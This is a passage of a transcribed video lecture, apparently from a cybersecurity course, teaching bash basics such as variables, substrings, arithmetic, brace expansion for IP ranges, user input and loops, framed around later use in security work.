don't cover it in this class you may have to Google just to see exactly how to run this but this is really helpful because a lot of bash commands and a lot of bash scripting is going to require all lowercase or all uppercase so for example a lot of times when you run against an active directory name let's say you have the active directory name a lot of times they will be in all caps and you can use the double up carrot just like this if you're running a script against it and you don't want to type it and you get all caps so that's an example of when you would want to use something like this in the world of hacking and there's a couple other things that might be useful for you that you can do if we wanted to we could come in here and we can put in the an exclamation or sorry we can if you wanted to come in here and put in a hashtag we can save this and run it and we get the length of the output and with this word count we can use this later let's say if we have a list and we want to know how many items are in a list we can use something like this to check what is going on within the inside and lastly there is something we're going to need to know in order to grab numbers or in our case we may want to grab something out of a out of a string and we want like every third word is help would be beneficial to us to grab if we have something instead of name let's give this as num equals one two actually we'll start at zero because bash all programming languages start at zero when they start counting so if we come down here and we Echo let me say dollar sign our parentheses and then we say num we should get our number our string of numbers put out down here but if we wanted to grab numbers out of here we would do something like this it will be the variable right here so we'll have the ver the variable and then the offset meaning what how many over would we like to start and then we have the length meaning at what number would we like to stop so in here we can say colon and if we wanted to grab numbers one and two you would say zero one two so a lot of times you won't start at zero so for example we would say 0 1 2. so if we want to grab the 2 and the 3 we would say something like this 0 1 and then 2. and then if we save this and we run our file we get number two and three but for the sake of this not being super confusing we'll start with zero one two three but what you just have to remember that you just have to remember in the world of programming computers start at zero and this is our number one so one two three just like this or in this case it'd be zero one two three and if we got rid of this we would have to say 0 1 2 3 and so on so I hope that makes sense and you are able to grab numbers out of this string and maybe you can go ahead and try and practice with grabbing numbers you can also do something like this you have to have a space in order to run a negative offset but let's say we wanted to go backward four and then we want to grab the next two afterward we can save this and you can run something similar to this and you get a totally separate set of separate numbers and I do use this every now and then it's not super common and you might see it in the future so it is something worth noting and keeping it in your back pocket okay I want to show you that we can save commands inside of variables and then we're able to run them inside of our scripts this will be helpful in the future so you're probably familiar if we come down to our terminal and we type in PWD of seeing our present working directory but we can save commands inside of scripts and then you use them so for example we can say directory equals actually we can say current we'll say curders for our current directory equals and then we say dollar sign and then we put our parentheses and we say a PWD now if we come down here and we Echo a variable and we say current directory just like this and we save this out and then we run our script we get our present working directory down here so another example of this is if we say time and we said equals and then we put in date inside of here we could say Echo and then we want to Echo a variable but before that we could say the current time is and this is going to give us our time and date and if we save this and we now run our script it tells us that we messed this up because we didn't write in the time right here and we save that now we run it it tells us the current time is Saturday June 4th at this time so that's how we can save commands inside of variables and this is going to be helpful in the future whenever we have to write specific scripts and use them with commands that are already within our Linux machine so from here we're going to move more into working with numbers and the numbers will matter when dealing with things like IP addresses or sometimes you may want to print a word list that you want to use as with a fuzzer that has numbers on the end of it and we're going to be covering this in the coming up section okay we're going to be covering some numbers and adding them together and using a sequence of numbers in order to grab a range of IP addresses or possibly even make a password list with numbers but with bash this is a little different than other programming languages so you can either take this whole block right here that we've already written and comment it out or you can just delete it like I'm going to if you want to you can save it and keep it as notes for later so within bash if we say something like other programming languages x equals four and then we say y equals eight and then we Echo and the thing about bash when we want to add these together it's going to require a little different syntax than you might think so we use dollar sign then we have double quotes and then we would say dollar sign X Plus dollar sign y and now if we save this and we run it we get 12 down here and I believe within bash you don't even actually have to have the dollar sign so we'll give this a try right here and it still gives us 12 and this works with also we have minus and you can run divide and other commands like this so if we run division we have zero which is right because a doesn't go into four and Bash won't give us any decimals and it won't give us any negative numbers which is really interesting so if we say y minus X and we save this we now get 4. if you want to run something such as a calculator within bash you have to use BC B but I'm not going to cover that for the sake of this course I would rather tell you just use a calculator because it's going to be a lot easier than using the command line to run some kind of math so this is how we would use variables and numbers within bash but when it becomes useful for us is when we want to create a list of say numbers so if we say Echo month and then we put curly braces and then we say one dot dot 12. when we run this command it should print month one month two month three and so we'll save it and I'll show you what this looks like so we have the output like this and this may seem like it's not very useful in the world of hacking but let's say we have an IP address and we want to create a list to scan against in the future and maybe we're creating some kind of tool that is going to take an input of an IP and the range we could say we have a subnet of a 124 so we'd say one 255 through one 1 through 255 then we save this and then we run it we now have all of these IP addresses I forgot to put a point right here and now we'll save it and we'll try this again and now we have all of these IP addresses and we have this list that has a complete range of IP addresses for our range so this is a helpful way to know that we can append numbers to something preceding it so this will be helpful in the future I don't use it a whole lot but it is helpful to know that it is available for us if we ever run into any kind of problem okay I want to cover something called special parameters because it is something you're going to run into in the world of cyber security so we'll clear this and we can comment this out and the reason you're going to run into this is when you run something a tool or some kind of exploit that requires input from the user say us whenever we want to run this It'll ask for a IP address we want to attack and a port to connect back on you may see it say that you didn't enter everything required and an example of this is if we say if and then we go square bracket square bracket and then this right here is a special parameter so this is going to tell us that we need right here two inputs from the user when they run the file so we have this if and then it's going to be a then and then this will be tabbed over and we'll Echo need more parameters and it'll tell us Echo usage requires usage needs two and then we can give it an exit of one which means we have an error and then in then for bash instead of an if else or an if or an elif like python it uses an fi and we can run it like this so we should be able to now save this okay we should now be able to save this after putting in those spaces and it should run for us so if we run this it'll tell us you need more parameters but if we run it and we say um let's just use one space two these are going to be two inputs from us and we run it it doesn't give us any issues in fact we could do a we could have it print script worked but in this case we'll just leave it so that way you can see we didn't get any exit code it needs two inputs from the user in order to execute so with that this looks really really scary but really what I wanted you to see was this is the special parameter that tells the file that we need the bash will tell us that we need two inputs from the user in order to make this script actually run so these are special parameters and they are going to be one of those things that if you want to memorize them I would suggest which I rarely ever suggest things like this is flash cards and memorize usually when you're in the world of programming as well as cyber security you would just say I know there's a way to use a dollar sign in order to get to inputs from a user and I just need to know it and later when I run into this I can just come back and Google how to do this and read how to do it it saves you a lot of headache and a lot of time memorizing because you're probably not going to use this very often your and will forget it but it's in it's important to know that this exists because maybe in the future you will run into an exploit that has something like this but the exploit is old and maybe it has been deprecated within the version that we're running our exploit against and we need to get rid of one of the parameters you now know that you can come in and say instead of two let's say it had four and it has been deprecated and it no longer needs four inputs it only needs three you can come back and just put in three and now you can run the exploit as you need so this is the reason I would suggest trying to remember that this dollar sign hash does has this specific special parameter function because it is something you may run into in the future and need to know how to modify we're going to ignore the if statement for now and we're going to look at a different way to take input from the user and that is with the read command so you can just say something like this read and then we can say maybe we want an IP address and we want a port number we'll just leave it at that for now so we can go enter and then we could say something like Echo it is going to be with a variable variable is IP then we can come back here to the front say something like the IP we'll say that the target target IP is and then we'll have that IP and then we'll say Echo with a another that was with a text that's okay we can just add our variable in later we can say the connection Port is and then we'll go dollar sign curly braces excellent two curly braces we will say the port and then close off r irly brace there now one thing that you're going to notice is why is our variable not lit up and the reason is because single quotes get rid of every special character inside of a string and double quotes will leave all variables alone so that is something to note for the future so now if we save this and we come down here and run our file it's going to leave a prompt and we could say the IP address is 10 10 10 10 10 and then the space puts us onto the second variable and we'd connect back on Port 444 and then we hit enter and it tells us the target IP is this and then the connection Port is this now there is a better way to do this and what we could do is something like this we'll delete the port and we can put a dash p and this is going to give a prompt to the user and we'll say input the target IP colon space we'll add the space in here and now we could say read Dash p and then we can do the same thing and say input the connection port colon space and then we can come in here and put in Port now if we save this and we run it again we have an a prompt down here and then we hit enter and then it asks us for a connection port and we put in our connection port and then it prints out for us the target IP port or the target IP and the Target Port so this is how you take input I like this a lot better because it is user friendly and it's really simple for us to read what is going on and this way we cannot skip say in input and if we put in an empty input as our Port then we would have an error with an if statement and we'll cover that in the coming section before we move into our if statements and Loops we need to understand conditional statements or conditional operations so we will comment out this code right here I hit the wrong button we'll comment out this code right here and we will see things like this you'll see a dash EQ which is going to be in equal to or maybe we will see something like a dash in E which is not equal to you can see something like a dash GT which is going to be a greater than I'm going to go ahead and comment this out so it stops suggesting things to me so we'll see a dash EQ a dash in E the dash GT which is greater than and then a dash LT Which is less than or a dash geq which is greater than or equal to which is the one we probably will be using the most and then a dash L EQ Which is less than or equal to these will be really helpful when running our for loops and so it is helpful to know so let's give a low look at these in action so the way we would write this is if we wanted to give a statement we'd put our brackets and there has to be a space in between the bracket and the first number so we would say if 2 and then we'd say Dash EQ is equal to 2 then we're going to have it do something and we would tell it to Echo that the statement is true and the way we would do this is by adding the colon and then say Echo and then dollar sign and then question mark and the reason we're using the dollar sign question mark is because it's going to return a Boolean so a Boolean is something that is going to be true or false so it's going to return true which is going to be equal to 0 and if you're from another programming language then you will know this is not normal for most other programming languages but bash true is zero and false is going to be equal to one so this is going to retrue this is going to return true or false in the form of a one or a zero so when we run this we'll save it and now when we run this we should return back a true statement 2 is equal to 2 but if we change this to 3 and we save it and we run it we get a false this is not true so this equals right here only works with integers which is which is numbers it is really important to remember that it only works with numbers so we can do something like this and we can say not equal to so is 3 not equal to two delete this and it returns true so we have this true given to us right here when we run something like is three greater than two and we'll save this we can run it and we get a true is it less than two and we will get a false this is really helpful when we run our for Loops in the future you're going to you will run into this you're going to see it and it's something to be aware of okay we can also look at conditional operations for Strings an example of this would be we'll uncomment this would be something like this so it will use an equals and we'll say the word word is equal to word and now if we save it and we run this we get it is false because I spelled it wrong save and we run it and we get a true so this this equals is used for Strings and if we want to say a not equals you put a bang in front of it or an exclamation point and then if we save and run this we will get a false because it says they're not equal but they really are equal so if we check take off the end of this word save it and we run they are not equal is true so this is helpful especially if you're running a script that you are looking for a specific keyword within a text that has been fed in through an input you can check to see if they are equal and then have it do something afterwards so now we're going to move on into if statement so we're going to see how this plays into writing our if statements statement off of what we already have here we'll just make this a word and we'll make this equal to and then the way if statements work is you start an if statement with if and you can also use and else but when you're done with the if statement you write in Phi just like this so we can do if this is true then do this portion of code else if it's not true do this portion of code and then when the script hits fee it will exit so if we come in here and we just say if word equals word we're going to tell it then we want it to do something so we can come down here and say Echo and we're going to use Echo a text and we'll tell it to Echo words match and then we can come down here and tell it else we can do an else and we can tell it to Echo a text and we'll tell it does not match just like this I accidentally clicked the debug but we're not going to mess with that right now and then we're going to close this off now if we save this come back to our terminal and we run the file it tells us the words match if we get rid of our D again and we save and we run this it says they do not match so this is how you can use a comparison with an if then else fee statement so if it is this then we want it to do a specific function and if not we then we can have it do something else this is a very basic if statement so I would challenge you to change this if statement and see if you can do and if the number two is equal to the number two then you want it to Echo the numbers match else they do not match and then do the same thing with a not equals and just work your way through these and see if you can play around with if statement and really grasp these Concepts and make them your own we are going to be moving on to while loops and we're going to cover these really quickly because we won't use these a whole lot but an example of when a while loop is used is in a buffer overflow when we want to crash a program we're going to send it so many bytes until it crashes and so the example is we're just going to say while the this is running we're going to send bytes to the server until it overflows so while Loops are used but I use them very infrequently I don't use them often I know there are other programmers out there who love while loops and use them all the time I would much rather use a for Loop so for that purpose we're going to cover while Loops really quickly so while we're in our file here we're going to write a while loop and we're going to use a really common while loop that is used pretty much in teaching while Loops no matter what the programming language is so if we take an input from the user like this and we say enter a number and then we do our colon space and then we're going to assign it a variable of num just like this and then we say while the condition which is going to be the num is we'll say less than 10 we want to do something so down here it tells us we need to enter and enter in what we want it to do so we want to Echo or call out the number for us every time the while loop runs and then down here we need to make sure that our number continues to go up so we'll say num equals dollar sign and down here we will need two sets of parentheses and we will say dollar sign num Plus one and the reason we're adding in this plus here is each time the while loop runs we're going to add one to the number and so the First Time The Loop runs let's say we enter the number zero it will run through the while loop and then when it hits this line of code it'll be zero plus one the second time it runs through this Loop of code it'll be one plus one which is two and then two plus one is three every time it runs it's changing this variable so what we are going to do is save this and run it we'll run it a couple of different times so you can see how this works so let's say we enter 0 as our number I have an LS here and that is not it it is a less than which is an LT so we'll save this run it and our number is zero and it shows us it runs one two three four five six all the way down and remember that it starts here at one two three and here we go so it runs for us from zero all the way to ten now if we run it again and let's say we put in the number eight it only runs twice because nine when it hits ten when the number equals ten it is no longer less than 10. so now that we see how the while loop runs we can also do something like this if we enter in a number that is already greater than the number 10 it will just exit the code because it is no longer a less than so this is an example of how a while loop runs over and over and over until the statement up here is no longer true now I would challenge you to use this with a greater than and maybe change this to a minus and see if you can use an input of a number and say that you need this to be as long as the number is greater than 10 you want it to do this and then you're going to minus one and so you can kind of play around with a while loop and get an understanding of how it works all right I have typed out a for Loop here for us and this is a very basic for Loop so we have this for Loop here and four we have this 4 is how we're going to start at I which is going to be the variable which iterates through the list that we give it so we're saying 4i in this list of numbers we want it to do something and we want it to Echo out the variable I every time this Loop runs so the First Time The Loop runs I will equal 1 the second time it runs we'll put a 2 in here the I will equal to the third time it runs it's going to equal 3 and so on so if we save this and we run this file you can see I Echoes out one two three four five and so on so every time we use something like this and so this is the for Loop and you can play around with the for Loop in a lot of different ways and even use these to Loop through lists or arrays in order to get it to print but the point of this course is not for us to learn how to program with for Loops but rather understand them and know how to edit them as we go through our cyber security Journey remembering that the point of us being able to understand bash is not to be bash programmers but in order for us to know how to manipulate bash scripts that are already written as well as bash exploits so when you see a for Loop like this you now know how you can edit it and change it and if you need to you can write simple bash for script for loops and loop through different arrays and lists

Info

Channel: PhD Security

Views: 326,805

Rating: undefined out of 5

Keywords:

Id: Rp69edBmFFo

Channel Id: undefined

Length: 680min 14sec (40814 seconds)

Published: Fri Oct 07 2022